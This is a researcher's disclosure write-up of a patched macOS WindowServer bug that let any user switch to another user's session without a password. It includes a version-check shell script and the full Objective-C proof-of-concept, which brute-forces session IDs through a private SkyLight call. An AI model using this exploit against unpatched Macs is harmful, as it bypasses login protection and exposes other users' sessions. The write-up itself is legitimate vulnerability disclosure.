SkyLight user session exploit

I stumbled on a WindowServer bug allowing any user to switch to another user's session without entering their password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.

Bizarrely, the bug reappeared; it was fixed again in macOS 13.6.4 and 14.1.
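Because the fix shipped twice, a host is only known to carry it if its version is at or above the fix for its own major release. The check below is an added example, not code from the post; it hard-codes exactly the four fix versions named above (11.6.1, 12.0.1, 13.6.4, 14.1) and reports "below-fix" rather than "vulnerable" for anything older, since the post does not say at which 13.x build the regression started.

```shell
#!/bin/sh
# Report whether a macOS version is at/above the SkyLight fix for its major.
# Fix versions are taken from the post; nothing else about the bug is assumed.

# field VERSION N -> N-th dotted component, missing components read as 0
field() {
  printf '%s.0.0\n' "$1" | cut -d. -f"$2"
}

# vercmp A B -> -1 if A<B, 0 if equal, 1 if A>B (three numeric components)
vercmp() {
  i=1
  while [ "$i" -le 3 ]; do
    x=$(field "$1" "$i"); y=$(field "$2" "$i")
    if [ "$x" -lt "$y" ]; then printf '%s\n' -1; return; fi
    if [ "$x" -gt "$y" ]; then printf '%s\n' 1; return; fi
    i=$((i + 1))
  done
  printf '%s\n' 0
}

# skylight_fix_status VERSION -> "fixed", "below-fix <fix>", or "not-covered"
skylight_fix_status() {
  v=$1
  case $(field "$v" 1) in
    11) fix=11.6.1 ;;   # first fix (Big Sur)
    12) fix=12.0.1 ;;   # first fix (Monterey)
    13) fix=13.6.4 ;;   # second fix after the regression (Ventura)
    14) fix=14.1 ;;     # second fix after the regression (Sonoma)
    *)  printf '%s\n' not-covered; return ;;  # majors the post says nothing about
  esac
  if [ "$(vercmp "$v" "$fix")" -lt 0 ]; then
    printf 'below-fix %s\n' "$fix"
  else
    printf '%s\n' fixed
  fi
}

# On a Mac, check the running system; elsewhere the functions are just defined.
if command -v sw_vers >/dev/null 2>&1; then
  skylight_fix_status "$(sw_vers -productVersion)"
fi
```

"below-fix" on a 13.x host means the second fix is absent, not that the first one was ever undone on that exact build; treat it as "patch to 13.6.4 or later" rather than as a confirmed exploitable state.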

thanks

ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!

code

This is the program I submitted. It brute-forces session IDs by calling SLSSessionSwitchToSessionID with each guess in turn; the function lacked the checks that should have stopped an unprivileged caller from switching the console to another user's session. A real attacker would do something cleverer: session IDs are readily available in logs and other APIs, so no guessing is needed.

```objc
// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing
@import Foundation;

// Private SkyLight (WindowServer client) API, declared by hand since there is
// no public header for it.
void SLSSessionSwitchToSessionID(int sessionID);
NSDictionary* SLSCopyCurrentSessionDictionary(void);
extern NSString* kCGSSessionOnConsoleKey;

int main() {
    // Try session IDs from 0 upward until the console is no longer ours.
    for (int guess = 0;; guess++) {
        NSDictionary* dict = SLSCopyCurrentSessionDictionary();
        // Once our own session is off the console, a switch to some other
        // session has succeeded without any password prompt.
        if ([dict[kCGSSessionOnConsoleKey] isEqual:@false]) {
            printf("😁\n");
            return 0;
        }
        [dict release];  // Copy* returns +1 and this is built without ARC
        SLSSessionSwitchToSessionID(guess);
    }
}
```